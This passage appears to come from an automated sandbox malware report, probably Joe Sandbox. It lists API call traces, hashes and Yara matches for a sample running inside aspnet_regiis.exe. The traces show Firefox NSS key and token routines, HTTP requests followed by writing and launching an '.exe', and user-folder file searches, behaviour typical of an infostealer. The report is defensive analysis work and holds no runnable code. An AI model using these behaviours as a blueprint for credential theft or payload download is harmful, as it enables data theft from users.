                                                                                                                                                                                • Part of subcall function 6CB82AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB80A1B,00000000), ref: 6CB82AF0
                                                                                                                                                                                • Part of subcall function 6CB82AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB82B11
                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6CBAAD5E
                                                                                                                                                                                • Part of subcall function 6CBC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB8B41E,00000000,00000000,?,00000000,?,6CB8B41E,00000000,00000000,00000001,?), ref: 6CBC57E0
                                                                                                                                                                                • Part of subcall function 6CBC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBC5843
                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6CBAAD36
                                                                                                                                                                                • Part of subcall function 6CB82F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB82F65
                                                                                                                                                                                • Part of subcall function 6CB82F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB82F83
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBAAD4F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                              • Opcode ID: 2293cac1dbbc8527bdd7313120561bc515799c59785df38e6f8e87da281bdb9d
                                                                                                                                                                              • Instruction ID: dce0ab289563cf51c484e59be82645fe5ae6b130123dc9d73967cc26e264bb3b
                                                                                                                                                                              • Opcode Fuzzy Hash: 2293cac1dbbc8527bdd7313120561bc515799c59785df38e6f8e87da281bdb9d
                                                                                                                                                                              • Instruction Fuzzy Hash: F12193B1D012549BEB10DFA4D9055EEB7B4EF05218F454069D885BB600FB31AA5ACFB2
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CBDF0AD,6CBDF150,?,6CBDF150,?,?,?), ref: 6CBDECBA
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB887ED,00000800,6CB7EF74,00000000), ref: 6CBE1000
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: PR_NewLock.NSS3(?,00000800,6CB7EF74,00000000), ref: 6CBE1016
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB887ED,00000008,?,00000800,6CB7EF74,00000000), ref: 6CBE102B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CBDECD1
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CBDED02
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE116E
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CBDED5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                              • Instruction ID: a26de4b6ec7e0af674cc0cea1c04df14ce3981fcf948c358a2c3f8eaeca902b6
                                                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9821A4B19007D25BE700CF25D944B5AB7E4FFA9348F26C21AE81C87662EB70E594C6D1
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CC15F17,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2AC94
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CC15F17,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACA6
                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACC0
                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACDB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                              • Opcode ID: ff580ee5f94ca903e1e4ad46de8b8922a151366b08041f724b9f349912d925c4
                                                                                                                                                                              • Instruction ID: 5ef1c80e0551de2cd88a8d9faec044a23205f086c95dc05220504b8bfce4dd32
                                                                                                                                                                              • Opcode Fuzzy Hash: ff580ee5f94ca903e1e4ad46de8b8922a151366b08041f724b9f349912d925c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 58018CB5A01B119BE710DF29D908747B7E8BF40699B104839D85EC3A00EB35F054CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC2D
                                                                                                                                                                                • Part of subcall function 6CBCADC0: TlsGetValue.KERNEL32(?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE10
                                                                                                                                                                                • Part of subcall function 6CBCADC0: EnterCriticalSection.KERNEL32(?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE24
                                                                                                                                                                                • Part of subcall function 6CBCADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CBAD079,00000000,00000001), ref: 6CBCAE5A
                                                                                                                                                                                • Part of subcall function 6CBCADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE6F
                                                                                                                                                                                • Part of subcall function 6CBCADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE7F
                                                                                                                                                                                • Part of subcall function 6CBCADC0: TlsGetValue.KERNEL32(?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAEB1
                                                                                                                                                                                • Part of subcall function 6CBCADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAEC9
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC44
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC59
                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6CC06AC6,6CC1639C,?,?,?,?,?,?,?,?,?,6CC15D40,00000000,?,6CC1AAD4), ref: 6CC2AC62
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1595327144-0
                                                                                                                                                                              • Opcode ID: 00319baf87b872b4d53799228b0164ac791d417a20b2874ee88631cac5740ef5
                                                                                                                                                                              • Instruction ID: 7a1393e9472f59657a9a9d1dd7347efad32d727e98bcd9d347325dda2f2a3a94
                                                                                                                                                                              • Opcode Fuzzy Hash: 00319baf87b872b4d53799228b0164ac791d417a20b2874ee88631cac5740ef5
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A014FB5A002109FDB00DF15E8C0B4677A8AF44B5CF1880A8E9498F706E735E844CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A365B6,?,?,?), ref: 02A10CD8
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10CDF
                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 02A10CEB
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10D16
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 377395780-0
                                                                                                                                                                              • Opcode ID: 93fee3369c0bf994b9461f88bce045d8d1621915f6314d84801d071b7e4fd67b
                                                                                                                                                                              • Instruction ID: c24352565ebcf78fd2350923809a5d839511e9f18f4f2b41c957512799aefb80
                                                                                                                                                                              • Opcode Fuzzy Hash: 93fee3369c0bf994b9461f88bce045d8d1621915f6314d84801d071b7e4fd67b
                                                                                                                                                                              • Instruction Fuzzy Hash: 30F031A1D40228BBDB109FE59D04ABF77BCAB0C711F400585F941E2180E638DA90D771
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(02A14FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A14FAC,?), ref: 02A12181
                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,02A14FAC,?,?,?,02A14FAC,?), ref: 02A12199
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14FAC,?), ref: 02A121A4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14FAC,?), ref: 02A121AC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4148174661-0
                                                                                                                                                                              • Opcode ID: 38a3b40c43dff5008bba76d78c8df1cf3024e080b93c82a17a43f6a6347f11d2
                                                                                                                                                                              • Instruction ID: 906e460097c0c823029c1a73da424ae44f38ab13137315b003ea99d80f4ace53
                                                                                                                                                                              • Opcode Fuzzy Hash: 38a3b40c43dff5008bba76d78c8df1cf3024e080b93c82a17a43f6a6347f11d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 84F01231A81234BBE71097A0DC49FDA7A7DEB09760F104650FE01B61C0DB70EB958664
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                                                              • Opcode ID: 342612764acc85330a430392e368b4d0379ce82596a8227fc110039ca4a8c586
                                                                                                                                                                              • Instruction ID: cd0ed2cb14cdf42636fe98b79a7aaf8ba7b2100c9b4e83d92f98b6c8761ea4b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 342612764acc85330a430392e368b4d0379ce82596a8227fc110039ca4a8c586
                                                                                                                                                                              • Instruction Fuzzy Hash: 83E03076700618ABCA10EFA8DC84886B7BCEE492703150565E695C3700D631F905CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A05237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0527E
                                                                                                                                                                                • Part of subcall function 02A05237: RtlAllocateHeap.NTDLL(00000000), ref: 02A05285
                                                                                                                                                                                • Part of subcall function 02A05237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A052A7
                                                                                                                                                                                • Part of subcall function 02A05237: StrCmpCA.SHLWAPI(?), ref: 02A052C1
                                                                                                                                                                                • Part of subcall function 02A05237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A052F1
                                                                                                                                                                                • Part of subcall function 02A05237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05330
                                                                                                                                                                                • Part of subcall function 02A05237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05360
                                                                                                                                                                                • Part of subcall function 02A05237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A0536B
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A12446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • _memset.LIBCMT ref: 02A12CDF
                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,02A36710), ref: 02A12D31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                              • API String ID: 2831197775-4119554291
                                                                                                                                                                              • Opcode ID: a5feab2284a3bd3e87ee5f08294697300bc2f73362ef24e40821f015e1bcab22
                                                                                                                                                                              • Instruction ID: 03f7b27c6e5822a5e4877328d94c14e15e5f8c3da0d751f4d74b3ddb9cf1d614
                                                                                                                                                                              • Opcode Fuzzy Hash: a5feab2284a3bd3e87ee5f08294697300bc2f73362ef24e40821f015e1bcab22
                                                                                                                                                                              • Instruction Fuzzy Hash: 31415136D80218ABDF11FBA4EE85ADE777AAF40364F410061EE05B7150DE70AE4A8FD1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                              • API String ID: 256744135-2556327735
                                                                                                                                                                              • Opcode ID: 80290da8c2b694f11ae865625dd6a7f3e67ba5935f0100eff076d7f991d3a43b
                                                                                                                                                                              • Instruction ID: 7a56682528727cd1533573f01397145a2ee8656b769992052132abc4a9067030
                                                                                                                                                                              • Opcode Fuzzy Hash: 80290da8c2b694f11ae865625dd6a7f3e67ba5935f0100eff076d7f991d3a43b
                                                                                                                                                                              • Instruction Fuzzy Hash: 98118C71300601AFAA249F2DE9C0D29B3BAFB943647040219F901EBA81DF71ADA5C6A1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                              • API String ID: 2803490479-3785015651
                                                                                                                                                                              • Opcode ID: b80ce0dced6f757e3e40f0c856cd99bd05bd8afb4376d0dedaa8d3dac1f59bda
                                                                                                                                                                              • Instruction ID: 2d23741c12f5142c4570da37e163271a11737684367a889be41acf55e8ee6933
                                                                                                                                                                              • Opcode Fuzzy Hash: b80ce0dced6f757e3e40f0c856cd99bd05bd8afb4376d0dedaa8d3dac1f59bda
                                                                                                                                                                              • Instruction Fuzzy Hash: 7211AD72D10218FFCB118FA5CC8489EBB7AFE05370B21026BFA19B2190DB719A40CA50
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F13E
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                                • Part of subcall function 02A0F238: std::_Xinvalid_argument.LIBCPMT ref: 02A0F242
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0F190
                                                                                                                                                                              Strings
                                                                                                                                                                              • invalid string position, xrefs: 02A0F139
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                              • API String ID: 3404309857-1799206989
                                                                                                                                                                              • Opcode ID: ab4920db7f9c842c58b83298395b09fd6fdd20485d934f5f89a1ec6259fcd6e3
                                                                                                                                                                              • Instruction ID: 8b73b4cc9a2f33df3813d7caca677bd47a0a81cde7b520c875229407f52233f9
                                                                                                                                                                              • Opcode Fuzzy Hash: ab4920db7f9c842c58b83298395b09fd6fdd20485d934f5f89a1ec6259fcd6e3
                                                                                                                                                                              • Instruction Fuzzy Hash: C1118E31704211AFDB24DE6CEDC0A59B3A6AF48324744055AEA16EBA81CF70ED44CBD1
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F35C
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              • memmove.MSVCRT(02A0EEBE,02A0EEBE,C6C68B00,02A0EEBE,02A0EEBE,02A0F15F,?,?,?,02A0F1DF,?,?,?,76F90440,?,-00000001), ref: 02A0F392
                                                                                                                                                                              Strings
                                                                                                                                                                              • invalid string position, xrefs: 02A0F357
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                              • API String ID: 1659287814-1799206989
                                                                                                                                                                              • Opcode ID: 10a7d493370c86c327728a83034fbb1308c76fd5e6c8090a030617c5b32200e1
                                                                                                                                                                              • Instruction ID: 615457ffe82cebaf2a7be52a95bebe1ba9017985fcfb94ef2d5574a64f9cd519
                                                                                                                                                                              • Opcode Fuzzy Hash: 10a7d493370c86c327728a83034fbb1308c76fd5e6c8090a030617c5b32200e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 1601AD713007018FD7348E69A8C452EB6F2EB84B25724497CE1A2D7A85DF78E84A8792
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: NameName::
                                                                                                                                                                              • String ID: {flat}
                                                                                                                                                                              • API String ID: 1333004437-2606204563
                                                                                                                                                                              • Opcode ID: 6e7c42c3e58c0ad504425cb734ed7d0beb55362689dd2e4755411f7c7ee387dc
                                                                                                                                                                              • Instruction ID: e4354b3537bde7b1fdef3b8c26f137e9241175f43ca1fc8264cf67ac040ba9a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 6e7c42c3e58c0ad504425cb734ed7d0beb55362689dd2e4755411f7c7ee387dc
                                                                                                                                                                              • Instruction Fuzzy Hash: 19F0ED311843889FCB01DF58D284BA43BA1BF4176AF088084F94D8F686CF71E482CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 587104284-2766056989
                                                                                                                                                                              • Opcode ID: de0ee014be6b0121cc03023c6516f93e2da1067d69be9b3bca7764b0214847ec
                                                                                                                                                                              • Instruction ID: 9a39f9b27fb9310836b3ceca96197837c46ef56f9a6b68903346ec1711226070
                                                                                                                                                                              • Opcode Fuzzy Hash: de0ee014be6b0121cc03023c6516f93e2da1067d69be9b3bca7764b0214847ec
                                                                                                                                                                              • Instruction Fuzzy Hash: EFE0BFF0D402089BDB40EFA4DE46B5DB7F9AB08704F500469AA06E7280EA74EA1A9A55
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A166A7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36B4C), ref: 02A166C4
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A166D7
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36B50), ref: 02A166E9
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
